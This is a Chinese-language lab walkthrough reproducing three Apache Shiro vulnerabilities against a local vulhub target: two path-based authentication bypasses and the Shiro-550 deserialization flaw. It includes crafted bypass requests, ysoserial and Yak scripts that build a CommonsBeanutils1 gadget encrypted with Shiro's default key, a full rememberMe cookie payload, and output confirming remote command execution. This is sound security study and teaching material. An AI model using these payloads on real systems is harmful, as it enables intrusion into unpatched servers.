目录

CVE-2010-3863(Shiro未授权)

使用浏览器访问靶场主页面

使用Yakit进行抓包

使用ffuf对靶机8080端口进行根路径FUZZ

CVE-2016-4437(Shiro-550)

使用浏览器访问靶场主页面

使用Yakit进行抓包

使用Yakit反连中自带的Yso-Java Hack进行漏洞利用

首先运行脚本生成一个Payload(恶意序列化数据)

接下来使用AES密钥对该数据进行CBC模式加密

将该Payload进行复制，拿到WebFuzzer模块中手动利用

通过Yso-Java Hack生成的自动化Yak脚本进行漏洞利用

CVE-2020-1957(Shiro未授权)

使用浏览器访问靶场主页面

使用ffuf对靶机8080端口进行根路径FUZZ

使用Yakit进行抓包

---

CVE-2010-3863(Shiro未授权)

启动该漏洞环境

docker-compose up -d

阅读vulhub给出的该漏洞的文档

# Apache Shiro 认证绕过漏洞（CVE-2010-3863）

Apache Shiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。

在Apache Shiro 1.1.0以前的版本中，shiro 进行权限验证前未对url 做标准化处理，攻击者可以构造`/`、`//`、`/./`、`/../` 等绕过权限验证

参考链接：

- <https://github.com/apache/shiro/commit/ab8294940a19743583d91f0c7e29b405d197cc34>
- <https://xz.aliyun.com/t/11633#toc-2>
- <https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3863>

## 环境搭建

执行如下命令启动一个搭载Shiro 1.0.0的应用：

```
docker compose up -d
```

环境启动后，访问`http://your-ip:8080`即可查看首页。

## 漏洞复现

直接请求管理页面`/admin`，无法访问，将会被重定向到登录页面：


构造恶意请求`/./admin`，即可绕过权限校验，访问到管理页面：


通过CNNVD对该漏洞进行相关信息检索

CVE官方给出的漏洞简介

Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.

使用浏览器访问靶场主页面

使用Yakit进行抓包

POST /doLogin HTTP/1.1
Host: 192.168.1.138:8080
Origin: http://192.168.1.138:8080
Priority: u=0, i
Referer: http://192.168.1.138:8080/doLogin
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 25username=123&password=456

对该包进行重放后，我观察到响应包头有shiro特征Set-Cookie: rememberMe=deleteMe;

HTTP/1.1 200
Set-Cookie: rememberMe=deleteMe; Path=/; Expires=Tue, 03-Dec-2024 14:51:35 GMT
Content-Type: text/html; charset=UTF-8
Content-Language: zh-CN
Date: Wed, 04 Dec 2024 14:51:35 GMT
Content-Length: 2632

使用ffuf对靶机8080端口进行根路径FUZZ

ffuf -u http://192.168.1.138:8080/FUZZ -w ../../../dictionary/Common-dir.txt

我对请求包进行构造，尝试直接访问/admin

POST /admin HTTP/1.1
Host: 192.168.1.138:8080
Content-Type: application/x-www-form-urlencoded
Priority: u=0, i
Origin: http://192.168.1.138:8080
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.138:8080/doLogin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 25

重放后获取响应

HTTP/1.1 302
Set-Cookie: JSESSIONID=AEEC9AFE4B1916B5542E1E81F06C0AE5; Path=/; HttpOnly
Location: http://192.168.1.138:8080/login;jsessionid=AEEC9AFE4B1916B5542E1E81F06C0AE5
Date: Wed, 04 Dec 2024 14:55:10 GMT

根据CVE官方的漏洞描述，我尝试在/admin接口前加上："/."

POST /./admin HTTP/1.1
Host: 192.168.1.138:8080
Content-Type: application/x-www-form-urlencoded
Priority: u=0, i
Origin: http://192.168.1.138:8080
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.138:8080/doLogin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 25

再次进行发包后获取响应

HTTP/1.1 200
Content-Type: text/html; charset=UTF-8
Content-Language: zh-CN
Date: Wed, 04 Dec 2024 14:57:14 GMT
Content-Length: 201<!doctype html>
<html lang="en"><head><meta charset="UTF-8" /><title>Congrats</title></head><body><h1>Congrats</h1><p>You have successfully logged in</p></body>
</html>

由响应"You have successfully logged in"可见，在真实环境中我们将成功通过/admin接口认证

---

CVE-2016-4437(Shiro-550)

启动该漏洞环境

docker-compose up -d

阅读vulhub给出的该漏洞文档

# Apache Shiro 1.2.4反序列化漏洞（CVE-2016-4437）

Apache Shiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。

Apache Shiro 1.2.4及以前版本中，加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie，触发Java反序列化漏洞，进而在目标机器上执行任意命令。

## 漏洞环境

执行如下命令启动一个使用了Apache Shiro 1.2.4的Web服务：

```
docker compose up -d
```

服务启动后，访问`http://your-ip:8080`可使用`admin:vulhub`进行登录。

## 漏洞复现

使用ysoserial生成CommonsBeanutils1的Gadget：

```
java -jar ysoserial-master-30099844c6-1.jar CommonsBeanutils1 "touch /tmp/success" > poc.ser
```

使用Shiro内置的默认密钥对Payload进行加密：

```java
package org.vulhub.shirodemo;

import org.apache.shiro.crypto.AesCipherService;
import org.apache.shiro.codec.CodecSupport;
import org.apache.shiro.util.ByteSource;
import org.apache.shiro.codec.Base64;
import org.apache.shiro.io.DefaultSerializer;

import java.nio.file.FileSystems;
import java.nio.file.Files;
import java.nio.file.Paths;

public class TestRemember {
    public static void main(String[] args) throws Exception {
        byte[] payloads = Files.readAllBytes(FileSystems.getDefault().getPath("/path", "to", "poc.ser"));

        AesCipherService aes = new AesCipherService();
        byte[] key = Base64.decode(CodecSupport.toBytes("kPH+bIxk5D2deZiIxcaaaA=="));

        ByteSource ciphertext = aes.encrypt(payloads, key);
        System.out.printf(ciphertext.toString());
    }
}

```

发送rememberMe Cookie，即可成功执行`touch /tmp/success`：


使用浏览器访问靶场主页面

使用Yakit进行抓包

 不勾选Remember me进行发包

将Remember me勾选后再次进行发包

在Shiro<= 1.2.24的版本中使用的是AES_CBC加密，且固定密钥：kPH+bIxk5D2deZiIxcaaaA==

我尝试构造恶意的序列化数据，并通过该密钥将其加密。

BASE64编码后传给服务器，经过层层解密服务器会将该序列化数据进行反序列化。

如果服务器没有过滤、识别该恶意数据，那我就可以在服务器中进行任意命令执行(RCE)

使用Yakit反连中自带的Yso-Java Hack进行漏洞利用

配置好利用链，我尝试在靶机/tmp目录下新建0dayhp文件

点击复制代码后来到Yak Runner，将代码粘贴

首先运行脚本生成一个Payload(恶意序列化数据)

log.setLevel("info")
gadgetObj,err = yso.GetGadget("CommonsBeanutils1",yso.useTemplate("RuntimeExec"),yso.obfuscationClassConstantPool(),yso.evilClassName("mhkuonUn"),yso.majorVersion(52),yso.useClassParam("cmd","touch /tmp/0dayhp"))
if err {log.error("%v",err)return
}
gadgetBytes,err = yso.ToBytes(gadgetObj,yso.twoBytesCharString(),yso.dirtyDataLength(0))
if err {log.error("%v",err)return
}// 16进制展示payload
hexPayload = codec.EncodeToHex(gadgetBytes)
print(hexPayload)

成功生成了十六进制的恶意序列化数据

接下来使用AES密钥对该数据进行CBC模式加密

log.setLevel("info")
gadgetObj,err = yso.GetGadget("CommonsBeanutils1",yso.useTemplate("RuntimeExec"),yso.obfuscationClassConstantPool(),yso.evilClassName("mhkuonUn"),yso.majorVersion(52),yso.useClassParam("cmd","touch /tmp/0dayhp"))
if err {log.error("%v",err)return
}
gadgetBytes,err = yso.ToBytes(gadgetObj,yso.twoBytesCharString(),yso.dirtyDataLength(0))
if err {log.error("%v",err)return
}// 16进制展示payload
hexPayload = codec.EncodeToHex(gadgetBytes)
//(hexPayload)// Shiro利用
// target = "127.0.0.1:8080"
base64Key = "kPH+bIxk5D2deZiIxcaaaA==" // base64编码的key
key,_ = codec.DecodeBase64(base64Key) // 生成key
payload = codec.PKCS5Padding(gadgetBytes, 16) // 加密payload
encodePayload = codec.AESCBCEncrypt(key, payload, nil)[0]
finalPayload = codec.EncodeBase64(append(key, encodePayload...))
print(finalPayload)

最终Payload

kPH+bIxk5D2deZiIxcaaaJRtWWEVM6RzoHdEfuirsu90DZ9gduxyvYXmLFCV6JQTpLULbF+Jx4CQh0Un6xCVPucqnfN/dqVj83NDGfzAUmR5IYAJdPRE0P5hLdbGAVr+8EAi03/O32SBpj1fezy86PXHJpFUTsvaW7BNhCOp1Tu7Ur0UmqnMM2hnx7+52DIW62SefLroPCD2Ip/yUA6q8GJP/x/5HvADlmK7y76EbVjcn9U2bcaANoNd5x7qZunhEGmJdim1ggBrH59Q5Dp1FpkwLfmmgbES17Kl908+gIGR4YdwTFSjziFl3y2Z7aQAj8x/FBBDOHtJhnfgZRtWWUGuBJRSDFDY7yMMojRw5sHKtLbOfoNpR2ZpT3nIRMB37kLigPGNBlCD2VN35IE3KUIvxpMVs4RbutCM+UxdRMRRtwgu+62IW6vEQkRrrI5pj/c3PIMhnGTEgNdYywgI4oVjCaXTs11zXLQNrGOUg9/9oyhVc/dAylkWWMcnSQUptVvZRKIYNl2P1kdg3g6RvgtVPacL6Ic9akOHR1Tgs2wN1u4odW12VETeTaK7b9M3F4X5pmzNxoIOnBkOFoTmKZ2mjtt1HdMb+G9fq1tGw4+ukzJycbduB5WMLGYY4tin3KVT7M44DRCDQtFzcmcvZtlydmTD47gy6KIxJf+WG359Us/m8+T8VeChXSY2drdH+PfH+hejKq7JY0fTg02mrNZY3BBmxg0bLd29EWqlrX34ZwL2Vx65bt01+SfZ4s8Ow76NkX62ANUV9JKI739thi8K23urNFIbp/WIN3cyW8x8lEir8lSpOilJeGABTd3bKXLZkmjEn060idX5ddxDd7z+XrEbV4Gtjxpxuj320JDmeiTQRSemvrAxjsY5eEQrKIBb6j2enHz+Oie/vydCZBok1kMyURvgf7+JUbBZ3g3Ak3no9KYWR9X+d6OuYbmvEd9CssQ/gtpqcPQapG3Kugi3SuTTp3vTQi3su2HJAuCEJpXey83jY6LMy7O3RsIwZRUlNbFEsNGf7DvUPREYygN+dKffrulUjnfcp68ofKJf7VUafktGKoeL/VgmsWt0kivc370YikjBzKRRCZAXw0mpXothhi9xeCosl5ybpa8N9ce/L8ZRBhPY05gBm4PUAQ39Kra/5xavUG2XSSeMo8sW/HsdRIzThoVxjhOhkzFPasdadQqDzb2qveSpXV36BgfjweGPx2l2rDQYQde3h2Krpg72bXyZXdPvlhZmLDePeov72YLDTGOB6apAte9BEX6GBud5/4401ybrz/ECDTlx5F+OHFD1dA3IPXQyOnwLDfFNzCOHgVqp4kX+CqYBvXtVtEHbXgU3JgXnoKw/sYvG0vGwxspjmIdzRJk3/sRV8Iqs5xjnnOXEY8rocmexlCzC5dK/jbIh2RCYS2mQLKtIjIYUe3kVnUaqSnsAvVyTt7+5RiFYxXBJBbweMF2yvZ+kmzyImncg/MrwhMOU7tgCfEnG91i1E8ZbMMFvHlfr6VU3A6evSBjhxLMjaB9gRa6cXQgBiDqK24AMeNhj+6uQNbG/Ogd+w5RYkXgH9qc5haylds8le/EG8GGO+nMhTgQ/bbqfJL8y2+14JLHq2HKymYesXsdoohFtvY469Flrld4XlRkPmKpotHfJRMAEPt2QPc0Ni4dLdNx5GWaGg5jJVhOIa1l7k3MJqq3gH6qeAE+zgQIiEtPfc22oFKqDvdLW35V2yyPnkcrSypzB7f+HsAkeccy1AIW9RRtjGxdCvexuF+nXtBDvSVWasexkGvletpxEStMrKrrYQYerljvxf1RUq9NDldyCLQvhcHE+0f7ORtAsSW2Rl4vX3otI/Emu/P+xlUr4RtysMrDa/kPnh+Xj8iCRSZZlNOi0hD0SG+dYgYyzx2f4UyNloZpmgPshJrD72eO1djNvCJnrwT8e5OlgI0dn99Hz0vqgvh15D717QZlYijE2Epjju9k5tGA6yOp79uCF5ayljy8NKTdggDKjo0dYZPHfheVUGMTV24FvoQrfboxlbiGxJk3mT1y9cTaJddE0f2psZgTwXhCZQ5IarwQ/dudXW3pQqc2xaoBaqYY6jS3y4W2gQuKDxPFil7sj67UcUeXpUFpOUbysGgIuI8KU5ERCbHp5OfWhImViwnp2m45eS2GlPDZvu6eAAq9eFacvs91juYwbvsM36mdsLqMCw8YJZnSv0qN2vnYrYanLPzIzFAjlfFn1cD1aiewsONgwgUcwtkc8H/xZgr+RbgEDX6auXkCOI/hKOMCABfNM1Cw6dMTNQ+oYeiAbykJK/iHdv58pzMFy70YR1AQ0RAr9DjAlwH6IcTyUtfduM25+DAKKiQgmOvNavKqJbuPqTPms7GpJoUitS0JDdxEw4+7xtvt9VQ6YuOCyjGNDMWubZk8uGDpk8vmpKbQYJep9h1ijWAw1y5GUAat9p66P1ia8HJs0G4ZYnom3017pdQr0177ba+8tSLa035liuL0Fe3+Fa07UastSuiGffhXpzJrIKtZhtrHZdO+TDmp7PBe5HxHkvyaLanvOLqPZnyL3p/fe7iiUklMu8286vG1cmfLs2cKu3menzM2yQy+RoAydaonXhFjdsest68vpgu9hKQgWfPy311LSwjKZKL0Ch2GukjrJ28f9/5H9U/wyc++MhCG9SNTAlnORXFUdjYBv+4E9ggOGMb8wQJUnCc0UjAFRcerl/Og2MihkO2yeitF96Opa5yakPvS6cTpxI/CFQPTlgOg4sN0MrHHXfNeaifEO5yZvBZSclAlhP+qciiRS4a7UjrI/HWkPb3xuUXGUAn4ITv6WJre9Lps9bzETDIUhZVPFLwDakZ2Yyt08B0RfrsHkkru6I7Z+3k0TodJadsNAwRb/RXSzOnckmY8kXsvegXUJttgRLLlgoWF+IIojKJoWEXdzdIOYG4Aet5fLALsfwLfQ5uRIlhbBdbvnmLjiHnKfi63LyJw8Xsx5eRfV9U6FqYjed6GPNdhftvMSM4qY7ETLlpIq05VZrIUrS23SdxSCTaCvtY3B4xDnYOLVxufhqRjtcAbAMwduY/blyu3zapyMB4o9Fg==

将该Payload进行复制，拿到WebFuzzer模块中手动利用

POST /doLogin HTTP/1.1

Host: 192.168.1.138:8080

Cache-Control: max-age=0

Content-Type: application/x-www-form-urlencoded

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Language: zh-CN,zh;q=0.9

Cookie: JSESSIONID=C9B098B3914070A665259F7AFF24211A; rememberMe=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

Referer: http://192.168.1.138:8080/login;jsessionid=C9B098B3914070A665259F7AFF24211A

Origin: http://192.168.1.138:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36

Accept-Encoding: gzip, deflate

Upgrade-Insecure-Requests: 1

Content-Length: 48

username=123&password=456&rememberme=remember-me

发包后获取响应头

HTTP/1.1 200

Set-Cookie: rememberMe=deleteMe; Path=/; Max-Age=0; Expires=Fri, 06-Dec-2024 09:43:04 GMT

Set-Cookie: rememberMe=deleteMe; Path=/; Max-Age=0; Expires=Fri, 06-Dec-2024 09:43:04 GMT

Content-Type: text/html; charset=UTF-8

Content-Language: zh-CN

Date: Sat, 07 Dec 2024 09:43:04 GMT

Content-Length: 2632

此时进入靶机，查看/tmp目录可见文件已成功被创建

root@d0e8725db316:/tmp# ls
hsperfdata_root  tomcat-docbase.2528687083482953528.8080  tomcat.6736820307613348021.8080
root@d0e8725db316:/tmp# ls
0dayhp  hsperfdata_root  tomcat-docbase.2528687083482953528.8080  tomcat.6736820307613348021.8080

通过Yso-Java Hack生成的自动化Yak脚本进行漏洞利用

这里使用快捷键"Ctrl+/"进行快速注释和取消注释，对target变量进行修改

log.setLevel("info")
gadgetObj,err = yso.GetGadget("CommonsBeanutils1",yso.useTemplate("RuntimeExec"),yso.obfuscationClassConstantPool(),yso.evilClassName("mhkuonUn"),yso.majorVersion(52),yso.useClassParam("cmd","touch /tmp/0dayhp"))
if err {log.error("%v",err)return
}
gadgetBytes,err = yso.ToBytes(gadgetObj,yso.twoBytesCharString(),yso.dirtyDataLength(0))
if err {log.error("%v",err)return
}// 16进制展示payload
hexPayload = codec.EncodeToHex(gadgetBytes)
//(hexPayload)// Shiro利用
target = "192.168.1.138:8080"
base64Key = "kPH+bIxk5D2deZiIxcaaaA==" // base64编码的key
key,_ = codec.DecodeBase64(base64Key) // 生成key
payload = codec.PKCS5Padding(gadgetBytes, 16) // 加密payload
encodePayload = codec.AESCBCEncrypt(key, payload, nil)[0]
finalPayload = codec.EncodeBase64(append(key, encodePayload...))
rsp,req,_ = poc.HTTP(`GET /login HTTP/1.1
Host: {{params(target)}}
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: no-cache
Cookie: rememberMe={{params(payload)}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
`,poc.params({"payload":finalPayload,"target":target})) // 发送payload
str.SplitHTTPHeadersAndBodyFromPacket(rsp)
log.info("发送Payload成功")
log.info("响应包: ",string(rsp))	

在靶机中将/tmp/0dayhp文件进行删除

root@d0e8725db316:/tmp# rm 0dayhp
root@d0e8725db316:/tmp# ls
hsperfdata_root  tomcat-docbase.2528687083482953528.8080  tomcat.6736820307613348021.8080

运行该Yak利用脚本

再次查看靶机/tmp目录，发现0dayhp文件被成功创建

root@d0e8725db316:/tmp# ls
hsperfdata_root  tomcat-docbase.2528687083482953528.8080  tomcat.6736820307613348021.8080
root@d0e8725db316:/tmp# ls
0dayhp  hsperfdata_root  tomcat-docbase.2528687083482953528.8080  tomcat.6736820307613348021.8080

---

CVE-2020-1957(Shiro未授权)

启动该漏洞环境

docker-compose up -d

阅读vulhub给出该漏洞的文档

cat README.zh-cn.md

# Apache Shiro 认证绕过漏洞（CVE-2020-1957）

Apache Shiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。

在Apache Shiro 1.5.2以前的版本中，在使用Spring动态控制器时，攻击者通过构造`..;`这样的跳转，可以绕过Shiro中对目录的权限限制。

参考链接：

- <https://github.com/apache/shiro/commit/3708d7907016bf2fa12691dff6ff0def1249b8ce#diff-98f7bc5c0391389e56531f8b3754081aL139>
- <https://xz.aliyun.com/t/8281>
- <https://blog.spoock.com/2020/05/09/cve-2020-1957/>

## 环境搭建

执行如下命令启动一个搭载Spring 2.2.2与Shiro 1.5.1的应用：

```
docker compose up -d
```

环境启动后，访问`http://your-ip:8080`即可查看首页。

这个应用中对URL权限的配置如下：

```java
@Bean
public ShiroFilterChainDefinition shiroFilterChainDefinition() {
    DefaultShiroFilterChainDefinition chainDefinition = new DefaultShiroFilterChainDefinition();
    chainDefinition.addPathDefinition("/login.html", "authc"); // need to accept POSTs from the login form
    chainDefinition.addPathDefinition("/logout", "logout");
    chainDefinition.addPathDefinition("/admin/**", "authc");
    return chainDefinition;
}
```

## 漏洞复现

直接请求管理页面`/admin/`，无法访问，将会被重定向到登录页面：


构造恶意请求`/xxx/..;/admin/`，即可绕过权限校验，访问到管理页面：


使用浏览器访问靶场主页面

使用ffuf对靶机8080端口进行根路径FUZZ

ffuf -u http://192.168.1.138:8080/FUZZ -w ../../../dictionary/Common-dir.txt

使用Yakit进行抓包

对请求包接口修改成/admin尝试进行访问，响应为302

根据vulhub漏洞文档对请求包进行构造

GET /0dayhp/..;/admin/ HTTP/1.1

Host: 192.168.1.138:8080

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9

Cookie: JSESSIONID=ff3e50f3-53a3-4e96-b42e-7f70e25153ea

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Referer: http://192.168.1.138:8080/

发包后获取响应

打开浏览器中，由Logout按钮可见当前是已登录状态，通过构造/XXX/..;/admin/成功进入后台